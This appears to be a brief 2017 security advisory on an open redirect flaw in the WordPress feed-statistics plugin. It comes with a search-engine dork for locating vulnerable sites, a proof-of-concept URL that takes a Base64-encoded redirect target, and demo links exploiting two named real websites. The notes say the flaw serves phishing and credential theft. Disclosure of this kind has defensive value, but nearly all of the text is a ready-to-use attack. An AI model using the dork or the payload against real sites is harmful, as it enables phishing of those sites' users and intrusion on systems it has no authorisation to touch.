[+] Title: WordPress feed-statistics Plugin Open Redirect Vulnerability
[+] Date: 2017-12-20
[+] Author: Mostafa Gharzi
[+] Vendor Homepage: www.WordPress.org
[+] Tested on: Windows 10 & Kali Linux
[+] Vulnerable File: /feed-statistics.php?url=
[+] Vulnerable Parameter: Get Method
[+} Dork : inurl:/wp-content/plugins/wordpress-feed-statistics/feed-statistics.php?url=
### Notes:
Unvalidated Redirects vulnerability in feed-statistics Plugin of WordPress , allows when application accepts untrusted input that could cause the web application to redirect the request to a URL contained within an untrusted input. By modifying untrusted URLs into a malicious site, an attacker can successfully launch a phishing and steal user credentials.
### URL Encoded by Base64:
[+] Example: https://www.google.com/
==> Base64 Algorithm
==> aHR0cHM6Ly93d3cuZ29vZ2xlLmNvbS8=
### POC:
[+} http://Site/wp-content/plugins/wordpress-feed-statistics/feed-statistics.php?url=[URL Encoded by Base64]
### Demo:
[+] http://blog.caplin.com/wp-content/plugins/wordpress-feed-statistics/feed-statistics.php?url=aHR0cHM6Ly93d3cuZ29vZ2xlLmNvbS8=
[+] http://fabianferber.de/wp-content/plugins/wordpress-feed-statistics/feed-statistics.php?url=aHR0cHM6Ly93d3cuZ29vZ2xlLmNvbS8=
### Special Thanks:
[+] CertCC.ir
[+] Gucert.ir